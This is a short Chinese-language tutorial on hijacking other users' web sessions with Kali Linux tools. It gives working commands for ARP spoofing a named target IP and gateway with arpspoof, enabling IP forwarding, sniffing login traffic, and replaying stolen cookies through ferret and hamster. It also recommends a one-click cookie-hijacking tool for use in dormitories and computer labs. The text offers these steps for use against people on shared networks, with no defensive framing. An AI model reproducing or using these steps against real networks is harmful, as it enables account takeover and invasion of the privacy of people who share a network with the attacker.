kali会话劫持的三种方法

0x01 所需工具
arpspoof -->用于arp欺骗
wireshark -->用于成功欺骗后的抓包
ferret -->重新生成抓包后的文件
hamster -->重放抓包后的文件
0x02 方法一:使用wireshark截取一段流量进行劫持
一、echo 1 > /proc/sys/net/ipv4/ip_forward
二、arp欺骗:arpspoof -i eth0 -t 192.168.43.197 192.168.43.1
三、启动wireshark抓包,截取打开网站到登录的流量,保存为.pcap文件,保存在/root 用户中,也就是Desktop上一级目录中。
四、启用工具ferret。
ferret -r .pcap 之后生成一个hamster.txt文件。
五、启动工具hamster,并根据提示设置指定代理,并访问127.0.0.1:1234,即可浏览会话记录。
0x03 方法二:使用hamster实时劫持会话
一、arp欺骗 arpspoof -i eth0 -t 目标IP 目标网关
二、利用工具ferret进入监听网卡模式。
ferret -i eth0
三、开启工具hamster,代理设置127.0.0.1:1234,访问127.0.0.1:1234,并设置eth0网卡,即可实时监听所嗅探的目标IP。
(PS:亲测,推荐第二种)
0x04 方法三:使用JAVA工具(CookieCadger-1.08.jar)一键劫持
在寝室、宿舍、机房开启此工具,秒天秒地秒空气,在此不做更多介绍,自行百度!